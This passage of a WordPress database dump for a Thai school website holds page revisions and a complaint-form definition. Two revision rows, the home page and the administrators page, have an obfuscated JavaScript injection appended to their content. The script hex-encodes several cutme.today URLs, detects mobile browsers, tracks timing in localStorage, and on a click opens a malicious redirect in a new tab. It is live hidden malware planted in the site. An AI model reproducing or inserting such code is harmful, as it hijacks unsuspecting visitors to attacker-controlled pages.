)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-02 08:51:26','2024-08-02 01:51:26','',14,'http://pakhaeng.ssk.in.th/?p=471',0,'revision','',0),
(473,1,'2024-08-02 08:52:07','2024-08-02 01:52:07','<!-- wp:shortcode -->\n[tmm name=\"%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลผู้บริหาร','','inherit','closed','closed','','469-revision-v1','','','2024-08-02 08:52:07','2024-08-02 01:52:07','',469,'http://pakhaeng.ssk.in.th/?p=473',0,'revision','',0),
(474,1,'2024-08-02 11:04:44','2024-08-02 04:04:44','{\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"simple\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32\\u0e01\\u0e23\\u0e2d\\u0e01 \\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e43\\u0e2b\\u0e49\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : 08x-xxx-xxxx\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : xxx@email.com\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"simple\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e0a\\u0e37\\u0e48\\u0e2d - \\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"16\":{\"id\":\"16\",\"type\":\"text\",\"label\":\"\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\\/\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e38\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\\/\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e1c\\u0e39\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23 \\u0e04\\u0e23\\u0e39\\u0e1c\\u0e39\\u0e49\\u0e2a\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d \\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e46 \",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\",\"description\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"checkbox\",\"label\":\"\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23 \\/ \\u0e2b\\u0e25\\u0e31\\u0e01\\u0e10\\u0e32\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21 (\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35) \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e08\\u0e31\\u0e14\\u0e2a\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e17\\u0e32\\u0e07 E-mail : 33010169@sisaketedu1.go.th\",\"choices\":{\"1\":{\"label\":\"\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"11\":{\"id\":\"11\",\"type\":\"text\",\"label\":\"\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"12\":{\"id\":\"12\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c \\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"14\":{\"id\":\"14\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 (\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07)\",\"format\":\"simple\",\"description\":\"\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"15\":{\"id\":\"15\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 